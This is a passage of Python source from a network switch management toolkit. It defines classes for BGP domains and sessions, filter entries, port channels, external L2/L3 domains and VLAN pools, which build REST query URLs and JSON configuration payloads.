:param peer: Instance of BGPPeer class to add to this bgpInst.
"""
if not isinstance(peer, BGPPeer):
raise TypeError('add_peer requires a BGPPeer instance')
if peer.get_addr() is None:
raise ValueError('BGPPeer address is not set')
if peer.get_remote_as() is None:
raise ValueError('BGPPeer remote-as is not set')
if peer in self.get_peers():
return
self.add_child(peer)
def remove_peer(self, peer):
"""
Remove a peer from this bgpInst
:param peer: Instance of BGPPeer class to remove from this\
bgpInst.
"""
if not isinstance(peer, BGPPeer):
raise TypeError('remove_peer requires a BGPPeer instance')
self.remove_child(peer)
def get_peers(self):
"""
Get all of the peers on this bgpInst.
:returns: List of BGPPeer instances assigned to this bgpInst.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPPeer):
resp.append(child)
return resp
def has_peer(self, peer):
"""
Check if the bgpInst has this particular peer.
:returns: True or False. True if this bgpInst has this\
particular BGPPeer.
"""
if not isinstance(peer, BGPPeer):
raise TypeError('has_peer requires a BGPPeer instance')
if peer.get_addr() is None:
raise ValueError('BGPPeer address is not set')
if peer.get_remote_as() is None:
raise ValueError('BGPPeer remote-as is not set')
return self.has_child(peer)
# AF
def add_af(self, af):
"""
Add a af to this BGP Domain.
:param af: Instance of BGPDomainAF class to add to this bgpInst.
"""
if not isinstance(af, BGPDomainAF):
raise TypeError('add_af requires a BGPDomainAF instance')
if af.get_type() is None:
raise ValueError('BGPDomainAF Type is not set')
if af in self.get_afs():
return
self.add_child(af)
def remove_af(self, af):
"""
Remove a af from this bgpInst
:param af: Instance of BGPDomainAF class to remove from this\
bgpInst.
"""
if not isinstance(af, BGPDomainAF):
raise TypeError('remove_af requires a BGPDomainAF instance')
self.remove_child(af)
def get_afs(self):
"""
Get all of the afs on this bgpInst.
:returns: List of BGPDomainAF instances assigned to this bgpInst.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPDomainAF):
resp.append(child)
return resp
def has_af(self, af):
"""
Check if the bgpInst has this particular af.
:returns: True or False. True if this bgpInst has this\
particular BGPDomainAF.
"""
if not isinstance(af, BGPDomainAF):
raise TypeError('has_af requires a BGPDomainAF instance')
if af.get_type() is None:
raise ValueError('BGPDomainAF type is not set')
return self.has_child(af)
@classmethod
def get_deep(cls, session, names=[], limit_to=[], subtree='full', config_only=False):
resp = []
assert isinstance(names, list), ('names should be a list'
' of strings')
# If no domain names are passed, get all BGPDomain names from the Switch
if len(names) == 0:
bgpdomains = BGPDomain.get(session)
for bgpdomain in bgpdomains:
names.append(bgpdomain.name)
if len(limit_to):
limit = '&rsp-subtree-class='
for class_name in limit_to:
limit += class_name + ','
limit = limit[:-1]
else:
limit = ''
for name in names:
query_url = ('/api/mo/sys/bgp/inst/dom-%s.json?query-target=self&'
'rsp-subtree=%s' % (name, subtree))
query_url += limit
if config_only:
query_url += '&rsp-prop-include=config-only'
ret = session.get(query_url)
# the following works around a bug encountered in the json returned from the Switch
ret._content = ret._content.replace("\\\'", "'")
data = ret.json()['imdata']
if len(data):
obj = super(BGPDomain, cls).get_deep(full_data=data,
working_data=data,
parent=None,
limit_to=limit_to,
subtree=subtree,
config_only=config_only)
obj._extract_relationships(data)
resp.append(obj)
return resp
def _generate_attributes(self):
attributes = super(BGPDomain, self)._generate_attributes()
attributes['rtrId'] = self._router_id
attributes['name'] = self._name
return attributes
def _populate_from_attributes(self, attributes):
self._router_id = str(attributes['rtrId'])
self._name = str(attributes['name'])
def get_json(self):
"""
Returns json representation of BGPDomain
:returns: json dictionary of BGP Domain
"""
attr = self._generate_attributes()
return super(BGPDomain, self).get_json(self._get_switch_classes()[0],
attributes=attr)
@classmethod
def get(cls, session, parent=None):
"""
Gets all of the BGP Domains from the Switch.
:param parent: Parent object of the BGPDomain
:param session: the instance of Session used for Switch communication
:returns: a list of BGPDomain objects
"""
bgpdomains = BaseNXObject.get_filtered(session, cls,
cls._get_switch_classes()[0], parent)
if parent:
if isinstance(parent, BGPSession):
for bgpdomain in bgpdomains:
parent.add_child(bgpdomain)
return bgpdomains
@classmethod
def exists(cls, session, bgpdomain):
"""
Check if a bgpdomain exists on the Switch.
:param session: the instance of Session used for Switch communication
:param bgpdomain: the instance of BGPDomain to check if exists on the Switch
:returns: True or False
"""
sw_bgpdomains = cls.get(session)
for sw_bgpdomain in sw_bgpdomains:
if bgpdomain == sw_bgpdomain:
return True
return False
@staticmethod
def get_identifier(cls):
return cls._name
@staticmethod
def get_url(str, fmt='json'):
"""
Get the URL used to push the configuration to the Switch
if no format parameter is specified, the format will be 'json'
otherwise it will return '/api/mo/sys/bgp/inst.' with the format string
appended.
:param fmt: optional format string, default is 'json'
:returns: URL string
"""
return '/api/mo/sys/bgp/inst/dom-%s/.' % (str) + fmt
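# For example, BGPDomain.get_url('default') returns
# '/api/mo/sys/bgp/inst/dom-default/.json' ('default' is an illustrative
# domain name).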
@staticmethod
def get_table(bgpdomains, title=''):
"""
Will create table of switch context information
:param title:
:param bgpdomains:
"""
headers = ['ROUTER ID']
data = []
for bgpdomain in sorted(bgpdomains):
data.append([
bgpdomain._router_id])
data = sorted(data)
table = Table(data, headers, title=title + 'BGP Domains')
return [table, ]
class BGPSession(BaseNXObject):
"""
Creates an BGP router interface that can be attached to a L3 interface.
This interface defines the BGP AS, authentication, etc.
"""
def __init__(self, as_num, parent=None):
"""
:param as_num: String containing the IPv4 as_num
"""
super(BGPSession, self).__init__(as_num)
self._as_num = as_num
self.options = ''
@staticmethod
def is_bgp():
"""
:returns: True if this interface is an BGP Session. In the case\
of BGPSession instances, this is always True.
"""
return True
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('bgpInst')
return resp
@staticmethod
def _get_parent_class():
"""
Gets the nxtoolkit class of the parent object
:returns: class of parent object
"""
return LogicalModel
def _get_url_extension(self):
return '/bgp/inst'
@staticmethod
def get_identifier(cls):
return cls._as_num
# AS Num
def get_as_num(self):
"""
Get the bgpSession AS Number
:returns: The bgpSession AS Number as a string
"""
return self._as_num
def set_as_num(self, as_num):
"""
Set the bgpSession AS Num
:param as_num: The bgpSession AS Number as a string
"""
if as_num is None:
raise TypeError('AS Number can not be set to None')
self._as_num = as_num
# Domains
def add_domain(self, domain):
"""
Add a BGP Domain to this BGP Session.
:param domain: Instance of BGPDomain class to add to this bgpInst.
"""
if not isinstance(domain, BGPDomain):
raise TypeError('add_domain requires a BGPDomain instance')
if domain.get_name() is None:
raise ValueError('BGPDomain name is not set')
if domain.get_router_id() is None:
raise ValueError('BGPDomain router-id is not set')
if domain in self.get_domains():
return
self.add_child(domain)
def remove_domain(self, domain):
"""
Remove a domain from this bgpInst
:param domain: Instance of BGPDomain class to remove from this\
bgpInst.
"""
if not isinstance(domain, BGPDomain):
raise TypeError('remove_domain requires a BGPDomain instance')
self.remove_child(domain)
def get_domains(self):
"""
Get all of the domains on this bgpInst.
:returns: List of BGPDomain instances assigned to this bgpInst.
"""
resp = []
children = self.get_children()
for child in children:
if isinstance(child, BGPDomain):
resp.append(child)
return resp
def has_domain(self, domain):
"""
Check if the bgpInst has this particular domain.
:returns: True or False. True if this bgpInst has this\
particular BGPDomain.
"""
if not isinstance(domain, BGPDomain):
raise TypeError('has_domain requires a BGPDomain instance')
if domain.get_name() is None:
raise ValueError('BGPDomain name is not set')
if domain.get_router_id() is None:
raise ValueError('BGPDomain router-id is not set')
return self.has_child(domain)
@classmethod
def get_deep(cls, session, names=[], limit_to=[], subtree='full', config_only=False):
resp = []
assert isinstance(names, list), ('names should be a list'
' of strings')
# If no names are passed, get all BGPSession names from the Switch
if len(names) == 0:
bgpsessions = BGPSession.get(session)
for bgpsession in bgpsessions:
names.append(bgpsession.name)
if len(limit_to):
limit = '&rsp-subtree-class='
for class_name in limit_to:
limit += class_name + ','
limit = limit[:-1]
else:
limit = ''
for name in names:
query_url = ('/api/mo/sys/bgp/inst.json?query-target=self&'
+ 'rsp-subtree=%s' % (subtree))
query_url += limit
if config_only:
query_url += '&rsp-prop-include=config-only'
ret = session.get(query_url)
# the following works around a bug encountered in the json returned from the Switch
ret._content = ret._content.replace("\\\'", "'")
data = ret.json()['imdata']
if len(data):
obj = super(BGPSession, cls).get_deep(full_data=data,
working_data=data,
parent=None,
limit_to=limit_to,
subtree=subtree,
config_only=config_only)
obj._extract_relationships(data)
resp.append(obj)
return resp
def _generate_attributes(self):
attributes = {}
attributes['asn'] = self._as_num
return attributes
def _populate_from_attributes(self, attributes):
self._as_num = str(attributes['asn'])
def get_json(self):
"""
Returns json representation of BGPSession
:returns: json dictionary of BGP Session
"""
attr = self._generate_attributes()
bgp_inst = super(BGPSession, self).get_json(self._get_switch_classes()[0],
attributes=attr)
return {'bgpEntity': {'attributes': {},
'children': [bgp_inst]}}
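# The payload returned above nests the bgpInst object under bgpEntity; roughly
# (illustrative, the exact inner shape depends on BaseNXObject.get_json):
#   {'bgpEntity': {'attributes': {}, 'children': [{'bgpInst': {'attributes': {'asn': '65000'}, ...}}]}}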
@classmethod
def get(cls, session, parent=None):
"""
Gets all of the BGP Sessions from the Switch.
:param parent: Parent object of the BGPSession
:param session: the instance of Session used for Switch communication
:returns: a list of BGPSession objects
"""
bgpsessions = BaseNXObject.get(session, cls, cls._get_switch_classes()[0])
if parent:
if isinstance(parent, LogicalModel):
for bgpsession in bgpsessions:
parent.add_child(bgpsession)
return bgpsessions
@classmethod
def exists(cls, session, bgpsession):
"""
Check if a bgpsession exists on the Switch.
:param session: the instance of Session used for Switch communication
:param bgpsession: the instance of BGPSession to check if exists on the Switch
:returns: True or False
"""
sw_bgpsessions = cls.get(session)
for sw_bgpsession in sw_bgpsessions:
if bgpsession == sw_bgpsession:
return True
return False
@staticmethod
def get_url(str, fmt='json'):
"""
Get the URL used to push the configuration to the Switch
if no format parameter is specified, the format will be 'json'
otherwise it will return '/api/mo/sys/bgp/inst.' with the format string
appended.
:param fmt: optional format string, default is 'json'
:returns: URL string
"""
return '/api/mo/sys/bgp/.' + fmt
@staticmethod
def get_table(bgpsessions, title=''):
"""
Will create table of switch context information
:param title:
:param bgpsessions:
"""
headers = ['AS NUM']
data = []
for bgpsession in sorted(bgpsessions):
data.append([bgpsession._as_num])
data = sorted(data)
table = Table(data, headers, title=title + 'BGP Sessions')
return [table, ]
class FilterEntry(BaseNXObject):
""" FilterEntry : roughly equivalent to vzEntry """
def __init__(self, name, parent, applyToFrag='0', arpOpc='0',
dFromPort='0', dToPort='0', etherT='0', prot='0',
sFromPort='0', sToPort='0', tcpRules='0'):
"""
:param name: String containing the name of this FilterEntry instance.
:param applyToFrag: True or False. True indicates that this\
FilterEntry should be applied to IP fragments.
:param arpOpc: 'req' or 'reply'. Indicates that this FilterEntry\
should be applied to ARP Requests or ARP replies.
:param dFromPort: String containing the lower L4 destination port\
number of the L4 destination port number range.
:param dToPort: String containing the upper L4 destination port\
number of the L4 destination port number range.
:param etherT: String containing the EtherType of the frame to be\
matched by this FilterEntry.
:param prot: String containing the L4 protocol number to be\
matched by this FilterEntry.
:param sFromPort: String containing the lower L4 source port\
number of the L4 source port number range.
:param sToPort: String containing the upper L4 source port\
number of the L4 source port number range.
:param tcpRules: Bit mask consisting of the TCP flags to be matched\
by this FilterEntry.
"""
self.applyToFrag = applyToFrag
self.arpOpc = arpOpc
self.dFromPort = dFromPort
self.dToPort = dToPort
self.etherT = etherT
self.prot = prot
self.sFromPort = sFromPort
self.sToPort = sToPort
self.tcpRules = tcpRules
super(FilterEntry, self).__init__(name, parent)
def _generate_attributes(self):
attributes = super(FilterEntry, self)._generate_attributes()
attributes['applyToFrag'] = self.applyToFrag
attributes['arpOpc'] = self.arpOpc
attributes['dFromPort'] = self.dFromPort
attributes['dToPort'] = self.dToPort
attributes['etherT'] = self.etherT
attributes['prot'] = self.prot
attributes['sFromPort'] = self.sFromPort
attributes['sToPort'] = self.sToPort
attributes['tcpRules'] = self.tcpRules
return attributes
def _populate_from_attributes(self, attributes):
self.applyToFrag = str(attributes['applyToFrag'])
self.arpOpc = str(attributes['arpOpc'])
self.dFromPort = str(attributes['dFromPort'])
self.dToPort = str(attributes['dToPort'])
self.etherT = str(attributes['etherT'])
self.prot = str(attributes['prot'])
self.sFromPort = str(attributes['sFromPort'])
self.sToPort = str(attributes['sToPort'])
self.tcpRules = str(attributes['tcpRules'])
def get_json(self):
"""
Returns json representation of the FilterEntry
:returns: json dictionary of the FilterEntry
"""
attr = self._generate_attributes()
text = super(FilterEntry, self).get_json('vzEntry',
attributes=attr)
filter_name = self.get_parent().name + self.name
text = {'vzFilter': {'attributes': {'name': filter_name},
'children': [text]}}
return text
@classmethod
def get(cls, session, parent, tenant):
"""
To get all of nxtoolkit style Filter Entries Switch class.
:param session: the instance of Session used for Switch communication
:param parent: Object to assign as the parent to the created objects.
:param tenant: Tenant object to assign the created objects.
"""
apic_class = 'vzRsSubjFiltAtt'
if isinstance(tenant, str):
raise TypeError
logging.debug('%s.get called', cls.__name__)
if tenant is None:
tenant_url = ''
else:
tenant_url = '/tn-%s' % tenant.name
if parent is not None:
tenant_url = tenant_url + parent._get_url_extension()
query_url = ('/api/mo/uni%s.json?query-target=subtree&'
'target-subtree-class=%s' % (tenant_url, apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
resp = []
for object_data in data:
dn = object_data['vzRsSubjFiltAtt']['attributes']['dn']
tDn = object_data['vzRsSubjFiltAtt']['attributes']['tDn']
tRn = object_data['vzRsSubjFiltAtt']['attributes']['tRn']
if dn.split('/')[2][4:] == parent.name and \
dn.split('/')[4][len(apic_class) - 1:] == dn.split('/')[3][5:] and \
dn.split('/')[3][5:] == tDn.split('/')[2][4:] and tDn.split('/')[2][4:] == tRn[4:]:
filter_name = str(object_data[apic_class]['attributes']['tRn'][4:])
contract_name = filter_name[:len(parent.name)]
entry_name = filter_name[len(parent.name):]
if contract_name == parent.name and entry_name != '':
query_url = ('/api/mo/uni%s/flt-%s.json?query-target=subtree&'
'target-subtree-class=vzEntry&'
'query-target-filter=eq(vzEntry.name,"%s")' % (tenant_url, filter_name, entry_name))
ret = session.get(query_url)
filter_data = ret.json()['imdata']
if len(filter_data) == 0:
continue
logging.debug('response returned %s', filter_data)
resp = []
obj = cls(entry_name, parent)
attribute_data = filter_data[0]['vzEntry']['attributes']
obj._populate_from_attributes(attribute_data)
resp.append(obj)
return resp
@classmethod
def create_from_apic_json(cls, data, parent):
"""
create from the apic json
:param data: json dictionary
:param parent: parent object
:return: object created from json dictionary
"""
attributes = data['vzEntry']['attributes']
entry = cls(name=str(attributes.get('name')),
parent=parent)
entry._populate_from_attributes(attributes)
return entry
@staticmethod
def get_table(filters, title=''):
"""
Will create table of filter information for a given tenant
:param title:
:param filters:
"""
headers = ['Filter', 'EtherType',
'Protocol', 'Arp Opcode', 'L4 DPort', 'L4 SPort', 'TCP Flags', 'Apply to Fragment']
data = []
for filter in sorted(filters, key=lambda x: (x.name)):
data.append([
filter.name,
filter.etherT,
filter.prot,
filter.arpOpc,
FilterEntry._get_port(filter.dFromPort, filter.dToPort),
FilterEntry._get_port(filter.sFromPort, filter.sToPort),
filter.tcpRules,
filter.applyToFrag,
])
data = sorted(data)
table = Table(data, headers, title=title + 'Filters')
return [table, ]
@staticmethod
def _get_port(from_port, to_port):
"""
will build a string that is a port range or a port number
depending upon the from_port and to_port value
"""
if from_port == to_port:
return str(from_port)
return '{0}-{1}'.format(str(from_port), str(to_port))
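# For example, _get_port('80', '80') returns '80', while _get_port('20', '21')
# returns the range string '20-21'.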
def __eq__(self, other):
if type(self) is not type(other):
return False
if self.applyToFrag != other.applyToFrag:
return False
if self.arpOpc != other.arpOpc:
return False
if self.dFromPort != other.dFromPort:
return False
if self.dToPort != other.dToPort:
return False
if self.etherT != other.etherT:
return False
if self.prot != other.prot:
return False
if self.sFromPort != other.sFromPort:
return False
if self.sToPort != other.sToPort:
return False
if self.tcpRules != other.tcpRules:
return False
return True
class PortChannel(BaseInterface):
"""
This class defines a port channel interface.
"""
def __init__(self, pc_id, admin_st=None, delay=None, descr=None,
layer=None, duplex=None, mtu=None,
snmp_trap=None, speed=None, link_log=None,
session=None, mode=None, min_link=None, interfaces=None,
pc_mode=None):
if not isinstance(pc_id, str):
raise TypeError ('string expected')
self.if_name = 'po' + pc_id
super(PortChannel, self).__init__(name=self.if_name)
self.pc_id = pc_id
self.admin_st = admin_st
self.delay = delay
self.descr = descr
self.layer = layer
self.duplex = duplex
self.link_log = link_log
self.mtu = mtu
self.snmp_trap = snmp_trap
self.speed = speed
self._session = session
self.mode = mode
self.min_link = min_link
self.access_vlan = None
self.pc_mode = pc_mode
if interfaces is None:
self._interfaces = []
else:
self._interfaces = copy.deepcopy(interfaces)
self._nodes = []
def attach(self, interface):
"""Attach an interface to this PortChannel"""
if interface not in self._interfaces:
self._interfaces.append(interface)
def set_access_vlan(self, access):
"""Set vlans for port channel"""
self.access_vlan = access
def detach(self, interface):
"""Detach an interface from this PortChannel"""
if interface in self._interfaces:
self._interfaces.remove(interface)
def is_vpc(self):
"""Returns True if the PortChannel is a VPC"""
return len(self._interfaces) > 1
def is_interface(self):
"""Returns True since a PortChannel is an interface"""
return True
def _get_interfaces(self):
""" Returns a single node id or multiple node ids in the
case that this is a VPC
"""
return self._interfaces
def _get_attributes(self):
attributes = {}
attributes['pcId'] = self.pc_id
if self.admin_st:
attributes['adminSt'] = self.admin_st
if self.delay:
attributes['delay'] = self.delay
if self.descr:
attributes['descr'] = self.descr
if self.duplex:
attributes['duplex'] = self.duplex
if self.layer:
attributes['layer'] = self.layer
if self.link_log:
attributes['linkLog'] = self.link_log
if self.mtu:
attributes['mtu'] = self.mtu
if self.snmp_trap:
attributes['snmpTrapSt'] = self.snmp_trap
if self.speed:
attributes['speed'] = self.speed
if self.mode:
attributes['mode'] = self.mode
if self.min_link:
attributes['minLinks'] = self.min_link
if self.pc_mode:
attributes['pcMode'] = self.pc_mode
if self.if_name:
attributes['name'] = self.if_name
attributes['id'] = self.if_name
if self.access_vlan:
attributes['accessVlan'] = self.access_vlan
return attributes
def get_url(self, fmt='json'):
"""
Get the URLs used to push the configuration to the Switch
if no format parameter is specified, the format will be 'json'
otherwise it will return '/api/mo/uni.' with the format string
appended.
:param fmt: optional format string, default is 'json'
:returns: URL string
"""
#return '/api/mo/sys/aggr-[po%s].json' % (self.pc_id)
return '/api/mo/sys/intf/aggr-[po%s].json' % (self.pc_id)
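# For example, a PortChannel created with pc_id '10' (illustrative) is pushed
# to '/api/mo/sys/intf/aggr-[po10].json'.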
def get_json(self):
"""
Returns json representation of the PortChannel
:returns: json dictionary of the PortChannel
"""
attributes = self._get_attributes()
children = []
for interface in self._interfaces:
att = {'tDn': 'sys/intf/phys-[%s]' % (interface.if_name)}
child = BaseNXObject.get_json(self, 'pcRsMbrIfs', attributes=att)
children.append(child)
return super(PortChannel, self).get_json('pcAggrIf',
attributes=attributes,
children=children)
@staticmethod
def get(session, pc_id=None):
"""Gets all of the port channel interfaces from the Switch
:param session: the instance of Session used for switch communication
:param pc_id: string port channel id
:return list of PortChannel objects
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if pc_id:
if not isinstance(pc_id, str):
raise TypeError('When specifying a specific port channel id, '
'the port id must be identified by a str')
query_url = '/api/mo/sys/aggr-[po%s].json?rsp-subtree=full'\
% str(pc_id)
else:
query_url = '/api/class/pcAggrIf.json?rsp-subtree=full'
pc_list = []
port_chs = session.get(query_url).json()['imdata']
for pc in port_chs:
pc_id = str(pc['pcAggrIf']['attributes']['pcId'])
layer = str(pc['pcAggrIf']['attributes']['layer'])
admin_st = str(pc['pcAggrIf']['attributes']['adminSt'])
desc = str(pc['pcAggrIf']['attributes']['descr'])
duplex = str(pc['pcAggrIf']['attributes']['duplex'])
delay = str(pc['pcAggrIf']['attributes']['delay'])
link_log = str(pc['pcAggrIf']['attributes']['linkLog'])
mtu = str(pc['pcAggrIf']['attributes']['mtu'])
snmp_trap = str(pc['pcAggrIf']['attributes']['snmpTrapSt'])
speed = str(pc['pcAggrIf']['attributes']['speed'])
session = session
mode = str(pc['pcAggrIf']['attributes']['mode'])
min_link = str(pc['pcAggrIf']['attributes']['minLinks'])
pc_mode = str(pc['pcAggrIf']['attributes']['pcMode'])
access_vlan = str(pc['pcAggrIf']['attributes']['accessVlan'])
trunk_vlans = str(pc['pcAggrIf']['attributes']['trunkVlans'])
interfaces = []
            for member in pc['pcAggrIf']['children']:
                if member.get('pcRsMbrIfs'):
                    interface = str(member['pcRsMbrIfs']['attributes']['tSKey'])
#module = interface.replace('eth', '').split('/')[0]
#port = interface.replace('eth', '').split('/')[1]
#interfaces.append(Interface('eth', module, port))
interfaces.append(Interface(interface))
new_pc = PortChannel(pc_id=pc_id, admin_st=admin_st,
layer=layer, descr=desc, duplex=duplex,
delay=delay, link_log=link_log,
mtu=mtu, snmp_trap=snmp_trap,
speed=speed, session=session, mode=mode,
min_link=min_link, interfaces=interfaces,
pc_mode=pc_mode)
new_pc.set_access_vlan(access_vlan)
pc_list.append(new_pc)
return pc_list
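# Usage sketch (illustrative only, not part of the toolkit API): reads port
# channels back from a switch using only PortChannel.get() and the attributes
# populated above. It assumes 'session' is an already logged-in Session
# instance.
def _example_list_port_channels(session):
    """Print every port channel id along with its member interfaces."""
    for pc in PortChannel.get(session):
        members = ', '.join(intf.if_name for intf in pc._interfaces)
        print('po%s  members: %s' % (pc.pc_id, members))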
class L2ExtDomain(BaseNXObject):
"""
L2ExtDomain class
"""
def __init__(self, name, parent):
"""
:param name: String containing the L2ExtDomain name
        :param parent: An instance of DomP class
"""
self.dn = None
self.lcOwn = None
self.childAction = None
self.name = name
super(L2ExtDomain, self).__init__(name, parent)
def get_json(self):
"""
        Returns json representation of the l2extDomP object
        :returns: A json dictionary of l2extDomP
"""
attr = self._generate_attributes()
return super(L2ExtDomain, self).get_json(self._get_switch_classes()[0],
attributes=attr)
def _generate_attributes(self):
"""
Gets the attributes used in generating the JSON for the object
"""
attributes = dict()
if self.name:
attributes['name'] = self.name
if self.dn:
attributes['dn'] = self.dn
if self.lcOwn:
attributes['lcOwn'] = self.lcOwn
if self.childAction:
attributes['childAction'] = self.childAction
return attributes
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('l2extDomP')
return resp
def get_parent(self):
"""
:returns: Parent of this object.
"""
return self._parent
@classmethod
def get(cls, session):
"""
Gets all of the L2Ext Domains from the Switch
:param session: the instance of Session used for Switch communication
:returns: List of L2ExtDomain objects
"""
toolkit_class = cls
apic_class = cls._get_switch_classes()[0]
parent = None
logging.debug('%s.get called', cls.__name__)
query_url = (('/api/mo/uni.json?query-target=subtree&'
'target-subtree-class=') + str(apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
resp = []
for object_data in data:
name = str(object_data[apic_class]['attributes']['name'])
obj = toolkit_class(name, parent)
attribute_data = object_data[apic_class]['attributes']
obj._populate_from_attributes(attribute_data)
obj.dn = object_data[apic_class]['attributes']['dn']
obj.lcOwn = object_data[apic_class]['attributes']['lcOwn']
obj.childAction = object_data[apic_class]['attributes']['childAction']
resp.append(obj)
return resp
@classmethod
def get_by_name(cls, session, infra_name):
"""
        Gets the L2Ext Domain with the specified name from the Switch
        :param session: the instance of Session used for Switch communication
        :param infra_name: string containing the name of the L2ExtDomain
        :returns: L2ExtDomain object if found, otherwise None
"""
toolkit_class = cls
apic_class = cls._get_switch_classes()[0]
parent = None
logging.debug('%s.get called', cls.__name__)
query_url = (('/api/mo/uni.json?query-target=subtree&'
'target-subtree-class=') + str(apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
for object_data in data:
name = str(object_data[apic_class]['attributes']['name'])
obj = toolkit_class(name, parent)
attribute_data = object_data[apic_class]['attributes']
obj._populate_from_attributes(attribute_data)
obj.dn = object_data[apic_class]['attributes']['dn']
obj.lcOwn = object_data[apic_class]['attributes']['lcOwn']
obj.childAction = object_data[apic_class]['attributes']['childAction']
if name == infra_name:
return obj
return None
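# Usage sketch (illustrative only): enumerate L2 external domains and look one
# up by name. Assumes 'session' is an authenticated Session instance; the
# domain name used here is a made-up example.
def _example_l2ext_domains(session):
    """Print all L2 external domain names and fetch one by name (or None)."""
    for domain in L2ExtDomain.get(session):
        print(domain.name, domain.dn)
    # get_by_name() returns a single object, or None when nothing matches
    return L2ExtDomain.get_by_name(session, 'l2dom-example')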
class L3ExtDomain(BaseNXObject):
"""
L3ExtDomain class
"""
def __init__(self, name, parent):
"""
:param name: String containing the name of the external routed domain
:param parent: An instance of DomP class
"""
self.dn = None
self.lcOwn = None
self.childAction = None
self.name = name
super(L3ExtDomain, self).__init__(name, parent)
def get_json(self):
"""
        Returns json representation of the l3extDomP object
        :returns: A json dictionary of l3extDomP
"""
attr = self._generate_attributes()
return super(L3ExtDomain, self).get_json(self._get_switch_classes()[0],
attributes=attr)
def _generate_attributes(self):
"""
Gets the attributes used in generating the JSON for the object
"""
attributes = dict()
if self.name:
attributes['name'] = self.name
if self.dn:
attributes['dn'] = self.dn
if self.lcOwn:
attributes['lcOwn'] = self.lcOwn
if self.childAction:
attributes['childAction'] = self.childAction
return attributes
@classmethod
def _get_switch_classes(cls):
"""
Get the Switch classes used by this nxtoolkit class.
:returns: list of strings containing Switch class names
"""
resp = []
resp.append('l3extDomP')
return resp
def get_parent(self):
"""
:returns: Parent of this object.
"""
return self._parent
@classmethod
def get(cls, session):
"""
        Gets all of the L3Ext Domains from the Switch
:param session: the instance of Session used for Switch communication
:returns: List of L3Ext Domain objects
"""
toolkit_class = cls
apic_class = cls._get_switch_classes()[0]
parent = None
logging.debug('%s.get called', cls.__name__)
query_url = (('/api/mo/uni.json?query-target=subtree'
'&target-subtree-class=') + str(apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
resp = []
for object_data in data:
name = str(object_data[apic_class]['attributes']['name'])
obj = toolkit_class(name, parent)
attribute_data = object_data[apic_class]['attributes']
obj._populate_from_attributes(attribute_data)
obj.dn = object_data[apic_class]['attributes']['dn']
obj.lcOwn = object_data[apic_class]['attributes']['lcOwn']
obj.childAction = object_data[apic_class]['attributes']['childAction']
resp.append(obj)
return resp
@classmethod
def get_by_name(cls, session, infra_name):
"""
        Gets the L3Ext Domain with the specified name from the Switch
        :param session: the instance of Session used for Switch communication
        :param infra_name: string containing the name of the L3ExtDomain
        :returns: L3ExtDomain object if found, otherwise None
"""
toolkit_class = cls
apic_class = cls._get_switch_classes()[0]
parent = None
logging.debug('%s.get called', cls.__name__)
query_url = (('/api/mo/uni.json?query-target=subtree&'
'target-subtree-class=') + str(apic_class))
ret = session.get(query_url)
data = ret.json()['imdata']
logging.debug('response returned %s', data)
for object_data in data:
name = str(object_data[apic_class]['attributes']['name'])
obj = toolkit_class(name, parent)
attribute_data = object_data[apic_class]['attributes']
obj._populate_from_attributes(attribute_data)
obj.dn = object_data[apic_class]['attributes']['dn']
obj.lcOwn = object_data[apic_class]['attributes']['lcOwn']
obj.childAction = object_data[apic_class]['attributes']['childAction']
if name == infra_name:
return obj
return None
class NetworkPool(BaseNXObject):
"""This class defines a pool of network ids
"""
def __init__(self, name, encap_type, start_id, end_id, mode):
super(NetworkPool, self).__init__(name)
valid_encap_types = ['vlan', 'vxlan']
if encap_type not in valid_encap_types:
raise ValueError('Encap type specified is not a valid encap type')
self.encap_type = encap_type
self.start_id = start_id
self.end_id = end_id
valid_modes = ['static', 'dynamic']
if mode not in valid_modes:
raise ValueError('Mode specified is not a valid mode')
self.mode = mode
def get_json(self):
from_id = self.encap_type + '-' + self.start_id
to_id = self.encap_type + '-' + self.end_id
fvnsEncapBlk = {'fvnsEncapBlk': {'attributes': {'name': 'encap',
'from': from_id,
'to': to_id},
'children': []}}
if self.encap_type == 'vlan':
fvnsEncapInstP_string = 'fvnsVlanInstP'
elif self.encap_type == 'vxlan':
fvnsEncapInstP_string = 'fvnsVxlanInstP'
fvnsEncapInstP = {fvnsEncapInstP_string: {'attributes':
{'name': self.name,
'allocMode': self.mode},
'children': [fvnsEncapBlk]}}
infra = {'infraInfra': {'attributes': {},
'children': [fvnsEncapInstP]}}
return infra
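# Usage sketch (illustrative only): build the JSON payload for a static VLAN
# pool. The pool name and VLAN range are made-up values; only get_json() is
# exercised, so nothing is pushed to a switch here.
def _example_vlan_pool_json():
    """Return the JSON for a static VLAN pool covering vlans 100-199."""
    pool = NetworkPool('example-pool', 'vlan', '100', '199', 'static')
    return pool.get_json()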
class Search(BaseNXObject):
"""This is an empty class used to create a search object for use with
the "find" method.
Attaching attributes to this class and then invoking find will return
all objects with matching attributes in the object hierarchy at and
below where the find is invoked.
"""
def __init__(self):
pass
class BaseMonitorClass(object):
""" Base class for monitoring policies. These are methods that can be
used on all monitoring objects.
"""
def set_name(self, name):
"""
        Sets the name of the monitoring object.
:param name: String to use as the name
"""
self.name = str(name)
self.modified = True
def set_description(self, description):
"""
        Sets the description of the monitoring object.
:param description: String to use as the description
"""
self.description = description
self.modified = True
def isModified(self):
"""
Returns True if this policy and any children have been modified or
created and not been written to the Switch
"""
for child in self._children:
if child.isModified():
return True
return self.modified
def get_parent(self):
"""
:returns: parent object
"""
return self._parent
def add_stats(self, stat_obj):
"""
Adds a stats family object.
:param stat_obj: Statistics family object of type MonitorStats.
"""
self.monitor_stats[stat_obj.scope] = stat_obj
self.modified = True
def remove_stats(self, stats_family):
"""
Remove a stats family object. The object to remove is identified by
a string, e.g. 'ingrPkts', or 'egrTotal'. This string can be found
in the 'MonitorStats.scope' attribute of the object.
:param stats_family: Statistics family string.
"""
if not isinstance(stats_family, str):
